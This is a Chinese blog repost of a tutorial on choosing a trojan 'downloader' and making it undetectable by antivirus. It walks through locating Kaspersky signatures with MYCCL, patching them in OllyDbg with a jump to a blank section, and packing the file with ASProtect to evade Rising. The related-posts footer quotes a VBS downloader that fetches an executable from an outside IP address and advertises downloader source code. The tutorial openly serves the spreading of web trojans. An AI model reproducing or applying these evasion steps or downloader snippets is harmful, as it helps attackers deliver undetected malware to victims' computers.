超强下载者免杀

AI权益加码!Claude Code、Cursor等20+工具费用! 购周边限时加赠Coding Plan Lite,畅享主流AI工具!学习进阶更高效! 阅读详情

超强下载者免杀By DarkRaY[D.S.T]

你在本文可以学到:

1.    如何挑选下载者

2.    如何免杀下载者

①选择下载者

现在是个网页木马横飞的年代,而一些比较稳定的远程控制木马的体积都很大,为了方便木马的传播,于是便有了下载者的产生,它是连接起网页木马和隐藏在幕后黑手的沟通桥梁。世面上的下载者随处可见,但一个真正好使用的下载者应该具备什么样的功能呢?在我认为至少应该具备以下几种功能:

1.       隐蔽性:包括能够删除自身,插入进程,达到保护自己的目的。

2.       穿墙性:不能穿越防火墙的下载者就像是被拉起来的铁索桥。

3.       自启动:这项功能可以灵活选择,一般来说中一次网页木马就会在后台自动下载了。

4.       体积小:一般来说下载者所占的体积最好不要超过5K

具备了这样几项功能的下载者,一般来说不错了。今天我给大家推荐的是由PERL编写的“4KDLL下载者(如图1)”。

(图1:下载者生成器的界面)

②免杀下载者

1.定位特征码

让我们来温习一下使用MYCCL定位特征码的方法。针对不同的杀毒软件有不同的免杀方法,这就要熟悉杀毒软件的杀毒机制和杀毒软件的强项。比如对于文件的免杀,我们的首要目标就是躲避卡巴斯基的查杀,下面请一步一步跟我来!

打开MYCCL,载入生成好的下载者,建议把带后缀打上勾(纯熟个人习惯,对于文件免杀的时候可以不用勾选,对于内存免杀一定要勾选)。我们可以看到,当选中文件以后,MYCCL会给出我们一些文件的信息,比如有哪些PE段(如图2),一般我们选取的PE段是CODE段,顾名思义也就是代码段了,我们在开始位置里填入CODE段的起始位置,在分段长度中填入CODE段的物理长度,在分块个数中我建议大家每次分段10份,这样多次分段查杀可以节约很多时间,设置完成后我们点击生成(如图3

(图3PE文件的节表信息)

(图3:全部设置完成后用MYCCL生成样本)

接下来,我们到需要免杀的下载者的文件夹下会有一个OUTPUT,我们用杀毒软件进行查杀!查杀的出来的记得要删除(许多杀毒软件中都有设置)被查杀的样本文件,再用MYCCL进行二次处理(如图4

(图4:发现一处特征码了)

我们选择“YES”继续生成样本让杀毒软件进行查杀,直到MYCCL提示找到特征码为止(如图5),然后我们点击特征区间,选中这段特征码,点击右键复合定位此处特征码,同样的在分块个数中我们设置10份,MYCCL会继续在OUTPUT下生成样本文件,重复刚才的步骤直到再此定位出特征码为止,一般要精确到2~4个字节,也就是比如000000F2F_00000199这段,下划线后面的部分末尾应该是2或者4(如图6)。

(图5:确定出特征码位置,并且给出图示)

(图6:定位出精确的特征码)

 [特征] 000010B9_00000002

2.修改特征码

我们用UE(界面如图7)来修改特征码,打开我们的下载者,找到000010B9这个位置,看看它对应的是字符还是什么,如果是字符我们可以尝试修改大小写来达到免杀目的,或者直接填加00H,但是有可能导致下载者功能被破坏设置运行出错。为了安全我们使用通用跳转法来修改特征码。我们需要知道000010B9_00000002在内存中对应的地址,打开OC(界面如图8),选择文件,填入文件偏移地址也就是000010B9,点下“>>>>”我们就可以得到特征码在内存中对应的地址了,这里是13141CB9。用OD载入,跳转到13141CB9位置(如图9),是MOV语句,如果你不懂汇编语言可以参考8088汇编手册,这个是比较语句,如果你对汇编了解的话可以使用等效替换语句来达到免杀的目的,我们今天的介绍的是通用跳转法,在以后的文章中DarkRay将告诉大家更多。好了,回到主题,我们复制下这句汇编指令,然后往下找空白段,也就是HEX值为0000的地方,我们把这段MOV汇编指令复制到空白段,记下空白段的地址,比如我找的是13141F44,在下面也就是13141F46JMP指令,JMP指令在汇编中是无条件跳转指令,我们跳回到特征码对应的内存地址中紧接着的语句,我这里是JMP 13141CBE(如图10)。然后回到特征码对应的内存地址处,也就是13141CB9,我们把这段MOV汇编指令修改成JMP汇编指令,跳到的地址就是我们刚才找的空白段13141F44。全部修改完成后,单击鼠标右键-复制到可执行文件-所有修改,保存完毕,特征码的修改也就完成了。用杀毒软件查杀,提示没有检测到病毒,剩下的工作就是测试功能的完整性了,建议大家安装POWERSHADOW(影子系统),是类似于还原精灵的软件,如果有任何错误重新启动就可以恢复了,这样菜菜们就不怕啦!

(图7:高亮部分就是特征码了,左边的是对应的ASCII字符)

(8:使用OC查询对应的内存地址)

(图9:跳转到特征码对应的内存地址处,查看相关的汇编指令信息)

(图10:找空白段修改汇编指令,这就是通用跳转法的典型思路)

3.加固防杀

修改文件特征码是对付卡巴斯基的好方法,卡巴的虚拟机脱壳技术很强悍,也就是上壳很容易就被查杀了,而我们修改了特征码再上壳卡巴是不会查杀的(不过也有特殊情况,卡巴查杀的不是下载者,而是壳)。对付了卡巴还有我们国产的内存杀毒能力很强的瑞星,对付瑞星我们只要上一层强悍的加密壳就可以了,比如北斗系列中的NSANTI,或者其他保护壳。我这里用ASProtect SKE(如图11)来逃过瑞星的查杀。选择OPTION,我们设置下相关参数,PROTECTION OPTION顾名思义就是保护参数,保持默认就可以了,FILE TO PROTECT就是你需要加壳的文件的地址,OUT就是输出的地址,再转到MODES,点击ADD MODES添加你刚才设置的模式,随便取个名字就可以了,我这里是DDDD,最后转到PROTECTION点击PROTECT就开始加壳执行保护了。这样一个比较完美的免杀下载者制作完成了。

(11ASPROTECT的操作界面)

4.总结

免杀的思路还有很多,和HACKING一样是注重思想的东西,还有很多的免杀方法,DarkRay会在以后的文章中告诉大家,对于免杀不会特征码定位的是肯定不行,这次我们又温习了一遍。如果大家有任何疑问欢迎到NOHACK论坛与我讨论,或者访问暗组http://www.darkst.com,我的IDDarkRay.

(本文所用到的工具:ASProtect SKE 2.3 BetaOCOLLYDBGMYCCL特征码定位器、ULTREDIT-32

 

DELPHI穿墙下载者源码(服务端加生成器) DELPHI穿墙下载者源码(服务端加生成器) 用途你懂的 立即下载

相关推荐

BAT下载者代码生成器

GHVJHKJBAT下载者代码生成器啊 早班

简单下载者 永远不被毒发现

自己写的一个下载者 因为没有复杂的东西 所以毒一般不会报毒的 不过缺点也是有的 自己开发吧 Option Explicit Private Declare Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal...

weixin_34409741的博客 328

下载者生成器

下载者 下载者生成器 批量下载者生成器

使用vb轻松打造个人下载者

    我们知道Visual Basic中对于网络的支持有个winsock控件可以轻易实现各种功能,但是使用了控件意味着 你的程序移植性将大大降低,在许多机器上你的程序将无法运行。这对木马等一些对可移植性要求高的程序简直就是一大遗憾,下面我介绍一种既快速又不使用winsock控件开发下载者的方法,如果有什么问题还望指教。Visual Basic中有个api-URLDownloadToFileA

trustyboy的专栏 788

VBS下载者

Set Post = CreateObject("Msxml2.XMLHTTP") Set Shell = CreateObject("Wscript.Shell") Post.Open "GET","http://202.75.208.29/calc.exe",0 Post.Send() Set aGet = CreateObject("ADODB.Stream") aGet.Mode...

weixin_30407099的博客 448

powershell思路分析(过某60和某绒)

文章首发于:https://forum.butian.net/share/936 写在前面 powershell做为微软windows系统自带的软件包,具有十分强大的功能,Windows PowerShell 是一种命令行外壳程序和脚本环境,使命令行用户和脚本编写者可以利用 .NET Framework的功能,在IT/系统管理员间得到普及。总的特点来说就是:方便、有效和隐蔽。举例来说,利用这些合法工具可以让威胁活动混在正常的网络流量或IT/系统管理工作内,也让这些恶意威胁能够留下较少的痕迹,使得侦测更加困难

技术超强的网络安全平台 2968

打造一款智能下载者 Downloader(统计系统安装篇)

本文主要介绍下载者后台统计系统的安装、使用与相关技术详解。

【Rainbow Network Technology co., LTD】 348

新世纪VIP所有教程费下载

新世纪VIP所有教程费下载 【基础篇】 第一课:2006年新技术综述 第二课:学习方法,技巧与环境介绍 第三课:06年流行工具综合应用技巧篇 第四课:手工加密,加花技巧综合篇 第五课:工具灵活组合搭配打造超强木马 【myccl使用技巧篇】 第六

rjgcwl的专栏 1414

首个采用真实数字签名木马出现

360安全中心今日发布橙色安全警报:一款名为“执照凶手”的恶性木马 者在短短9天内侵袭了近百万台电脑。经分析发现,“执照凶手”木马下载者在侵入网友电脑后,会强制运行“酷猪费在线影院”,通过色情电影发布大量低俗广告,同时还会不断弹出成人用品和游戏网站的广告页面。更可怕的是,它随时可以下载各种盗号木马和“肉鸡”控制程序,对网友的财产和隐私安全形成极大危害。据360安全专家介绍,由于该木马首次

亿光年 1066

易语言 过360卫士毒五引擎误报(2016.7.11)

点击阅读原文推荐使用EIDE助手内的优化编译出来的程序360卫士比较厉害的就是自创云查引擎。自称不用更新病毒库,就算新病毒也能几分钟具备查能力。觉得说白了其实就是白名单系统,只要你的软件,不在他的白名单内,全部默认查。这就是为什么大家都说,360误报率很高,不给钱就报毒的原因。再就是QVM人工智能引擎,和云查一家子,也不知道真是人工智能,还是白名单对比,反正这个也很厉害。说下自己过这两个引...

Missing 5796

快车复出——新版Flashget支持BT下载

支持BT下载: 支持选择部分文件下载。 智能磁盘缓存技术,保护用户的硬盘。 完全兼容DHT网络。 对不同的网络类型和上网方式实行不同的连接策略,更好地利用网络资源。 支持UPnP自动端口映射。 自动设置网络连接防火墙。 支持多Tracker协议。 在下载者之间共享可用连接信息,降低服务器负担。 超强的内网互连功能,帮助内网用户相互建立连接。 [url]htt...

weixin_34221276的博客 177

移动APP四大优势

在移动互联网市场,为自己的产品找到精准定位,才是开发者生存的最好保障。移动互联网比传统互联网能做的事情肯定会更多的。除了App的开发费用比以前的报纸、电视、网络广告都要低很多外,还有很多的优势,比如:精准性、互动性、创意性、超强的用户粘性等 精准性,App用户都是主动下载的,至少说明下载者对此App是感兴趣,多数的App都会有提供分享到微博、人人网、微信朋友圈等社交功能,聚集具有相似的兴趣的目标...

weixin_33815613的博客 663

磐龙下载者生成器

下载者生成器

将BT进行到底-BT客户端工具全收集

http://www.pconline.com.cn/download/zhuanti/btindex.htm将BT进行到底-BT客户端工具全收集 引言:使用FTP或者HTTP方式下载软件的时候,我们经常碰到这样的“下载悖论”:某个软件的人气越旺 ,下载越困难。原因很简单,服务器只有一个,网络带宽只有那么大,下载的人多了自然就会出现“僧多粥少”的局面,BitTorrent的出现彻

1581

第一次作业

我选取的三个软件是:Mobile Apps(手机应用)、Operating Systems(操作系统)、Games(游戏) 首先,Mobile Apps(手机应用)我们接触的是更多的,它有以下几个特点: 1、精准性   App都是用户主动下载的,至少说明下载者对品牌有兴趣。多数App都会提供分享到微博、人人等社交网站的功能,聚集具有相似兴趣的目标群体。同时,App还可...

dijiaochi0282的博客 70

手把手教你认识mac图标、制作DMG文件和刻录光盘

原贴地址:http://bbs.weiphone.com/read-htm-tid-496857.html ‍一、如何替换mac图标  下载samples,解压后观看“替换图标”,可以教你如何替换图标   Samples.zip (509 K) 下载次数:210   替换图标.rar (661 K) 下载次数:211  二、mac图标的几种常见

pjk1129专栏 4936

Git分布式 & SVN集中管理式

git&svn对比 一、集中版本控制系统svn svn属于集中式版本管理控制系统,系统中保存了所有文件的修订版本,而协同工作人员通过连接svn服务器(中央服务器),提取出最新的文件,获取提交更新 下图就是标准的集中式版本控制工具管理方式: 电脑A,电脑B,电脑C都提交代码到中央服务器,且从中央服务器下载,更新代码进行协同开发工作. 集中管理方式在一定程度上看到其他

zxd8080666的博客 650

新手学之myccl使用指南

的开始:用WinHex逐字节修改*** -> 到后来软件保护(加壳)的加入、特征码技术的公开、多层加壳的发现、反调试技术、针对于PE文件格式的,到如今盛行的源码。 再看反病毒的历程:从文件扫描技术、到通配符扫描技术、内存特征码扫描技术、虚拟机扫描技术、主动防御、启发式病毒查技术、云查。 我们不难发现,反病毒与反-反病毒这两项处于对立面的技术慢...

weixin_34279184的博客 673
上一篇: 木马免杀原理
下一篇: 免杀技术
cjs916
博客等级 码龄18年 2粉丝 3原创
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值